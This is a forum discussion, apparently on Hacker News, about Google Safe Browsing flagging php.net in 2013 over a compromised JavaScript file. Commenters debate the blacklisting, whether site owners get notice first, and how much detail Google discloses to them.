I work at Google and was the one who posted on our forums about this.
What our systems found was definitely a compromised JS file, and others on this thread have posted something similar to what we saw. This is not a false positive.
We have detailed help for webmasters in this kind of situation:
One thing that I strongly suggest to any webmaster in this situation is to look for any server vulnerability that allowed this file to get compromised in the first place. We sometimes see webmasters simply fix the affected files without digging into security hole that allowed the hack, which leaves the server vulnerable for repeat attacks.
php.net allows users to post answers and examples of code throughout the website. Likely, one of the submission forms has/had a hole that allowed someone to submit or alter actual JS code.
Thanks for the information. Can you confirm how long the malware has been on the site for, and if it's possible that people may have been drive-by'd before you flagged the domain? Also what systems did the malware target?
It's a pity you don't disclose which malware specifically the sites were distributing. As a user who may have been affected prior to google flagging it, it's frustrating to have no information on what to look for.
When I go to that page I see: "Of the 1838 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23."
As a student interested in security, will the js file be provided so we can examine and learn how this was done outside of privileged access?
EDIT
OKay looks like safe browsing said it is no longer suspicious. And I think someone already provided the JS file below.
Google's safe browsing looks pretty cool! Really powerful infrastructure. I wonder if they did this with virustotal?
Can virustotal recongize this?
Another thing is other search engines dont seem to have this built-in. I wonder people using DDG will ever think about querying Google safe browsing or not.
Does google provide an api (beside just querying safebrowsing directly).
I don't understand: you guys CLEARLY have the information on what, specifically, is causing the problem (which JS file, in this case). Yet for the site owner, you don't make it available? Or if it is, it's not at all easy to find the information. It's just this black box "go figure it out yourself" thing. Meanwhile you've essentially killed access to their site. Or is there something I'm missing?
But wasn't that only after rasmus posted about it on Twitter? And how would that have worked out for someone not running such a high profile site as him?
Once you're a confirmed webmaster for a given site, Google provides you with access to exactly what files are infected on your site. To provide that information publicly would be open the site up to further exploitation.
There are huge repercussions for any website that gets blacklisted with the Stop Badware clearinghouse, the least of which is the inability to figure out exactly where the problem actually is because the company you work for's information for a webmaster to resolve the problem is ridiculously minimal. There are no notifications (unless you are signed up for Google Webmaster Tools) and restoring a website to normal globally can take anywhere from 48 hours to two weeks. There are millions of developers who rely on the PHP website daily for performing their day jobs and you've now made it that much harder for us to do our jobs.
Stop Badware needs a serious overhaul. At the very least, they should contact the contacts in the WHOIS record for the domain BEFORE doing anything. Give the website owners 24 hours to resolve the issue before blacklisting the site. And give them a heck of a lot more information to go on than some vague text.
Also, there are several anti-virus vendors out there who use the clearinghouse database for their products...6 to 12 months after the original blacklisting. So this will happen all over again 6 to 12 months from now. Finding contacts for anti-virus vendors for removing domain blocks is a lot harder than removal from the blacklist on the Stop Badware site.
The CORRECT solution for this situation was to find a contact at PHP who could resolve the issue quickly and amicably. Seriously, how hard is it to locate Rasmus' e-mail address? Always try to find a human contact before using Stop Badware. You can chalk using Stop Badware for the PHP website as being the dumbest decision you've made this year. Hopefully this decision of yours will raise the ire of the Internet just enough to force the company you work for to revamp Stop Badware so it doesn't suck, Google Webmaster Tools so they don't suck, and the reporting tools for sending information to Stop Badware so they also don't suck.
Stop Badware needs a serious overhaul. At the very least, they should contact the contacts in the WHOIS record for the domain BEFORE doing anything.
Why? This isn't a responsible disclosure, "we found a potential vulnerability but we don't know if it's being exploited yet" kind of situation. This is a "there's a real threat to anyone visiting that site via your search engine right now" kind of situation.
As a user, I'd be much happier if the search engine flagged this immediately.
As a site owner, if someone found malware on my site I'd want to know ASAP too. Obviously it would be helpful if they sent me a notification and made the specific details of the identified threat available. However, I could hardly criticise them for blacklisting my site while it should be blacklisted, or for claiming that we were dangerous while we were actually serving malware.
Not clearing up the blacklists promptly after the threat is identified and removed is an entirely different question. If you're going to go around blacklisting sites then I think you also have a responsibility (and, for that matter, you should also have a legal obligation) to remove them from the blacklist with similar efficiency if you're notified that the threat has been removed. Claiming that someone's site is dangerous when it isn't is defamatory, and should be treated as such.
Google is not doing this as a service to the website, they are doing it as a service to the user. Giving the owner some kind of grace period to fix the issue could mean hundreds of thousands of people could get hit with a malicious script in the meantime.
If Google waited 24 hours before blacklisting a site, how many people would be infected during the grace period?
It's incorrect to say that Google doesn't attempt to contact the site owner. According to the Webmaster Tools support site [0], Google will send notices to several common email addresses when it blacklists a site.
> Seriously, how hard is it to locate Rasmus' e-mail address?
Why should google do that ? because it's Rasmus? they dont have to do that period.
The CORRECT SOLUTION is to protect users FIRST and not allow the site to infect more computers.
IT IS NOT google responsability to warn webmasters if their site are infected (though they can be warned by email automatically).
IT IS the webmaster's responsability to audit his website security, which obviously did not happen with php.net. If they get punished for that , that's FAIR , because it will force them to take security more seriously.
[edit]
it's hight time people move from httpd to something else like nginx. httpd is insecure by default, this is not how you deal with security. as for PHP, since it doesnt promote any good security practice by default, it should be avoided.
Are you seriously suggesting that Google should not immediately block a website when they detect malware on it... because millions of people are using that site?
I don't understand your suggestion that Google should have waited to protect their users from a site that is serving malware. Why would that be a good idea?
What our systems found was definitely a compromised JS file, and others on this thread have posted something similar to what we saw. This is not a false positive.
We have detailed help for webmasters in this kind of situation:
http://www.google.com/webmasters/hacked/
One thing that I strongly suggest to any webmaster in this situation is to look for any server vulnerability that allowed this file to get compromised in the first place. We sometimes see webmasters simply fix the affected files without digging into security hole that allowed the hack, which leaves the server vulnerable for repeat attacks.
Happy to answer questions.